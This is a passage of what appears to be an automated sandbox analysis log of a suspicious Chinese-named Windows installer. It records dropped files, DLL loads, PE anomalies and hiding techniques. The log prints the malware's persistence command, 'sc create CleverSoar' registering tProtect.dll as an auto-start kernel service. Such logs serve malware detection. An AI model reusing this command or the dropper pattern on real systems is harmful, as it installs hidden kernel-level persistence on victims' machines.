Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic file information: File size 5707472 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000D.00000003.2197135796.0000000000E60000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.2197029483.00000000030D0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F857D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_00F857D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343a15
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: real checksum: 0x0 should be: 0x571b37
Source: hrsw.vbc.6.drStatic PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.13.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeStatic PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.2.drStatic PE information: section name: .00cfg
Source: update.vac.2.drStatic PE information: section name: .voltbl
Source: update.vac.2.drStatic PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: is-R44JL.tmp.6.drStatic PE information: section name: .xdata
Source: hrsw.vbc.6.drStatic PE information: section name: .00cfg
Source: hrsw.vbc.6.drStatic PE information: section name: .voltbl
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC186EB push ecx; ret 6_2_6CC186FE
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CAC0F00 push ss; retn 0001h6_2_6CAC0F0A
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE6F10 push eax; ret 6_2_6CCE6F2E
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CC4B9F4 push 004AC35Ch; ret 6_2_6CC4BA0E
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 6_2_6CCE7290 push eax; ret 6_2_6CCE72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F045F4 push 00FAC35Ch; ret 11_2_00F0460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F9FB10 push eax; ret 11_2_00F9FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00F9FE90 push eax; ret 11_2_00F9FEBE
Source: update.vac.2.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.drStatic PE information: section name: .=~ entropy: 7.19316283520878
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\is-R44JL.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile created: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-D4O0V.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpFile created: C:\Users\user\AppData\Local\Temp\is-P0N7P.tmp\update.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
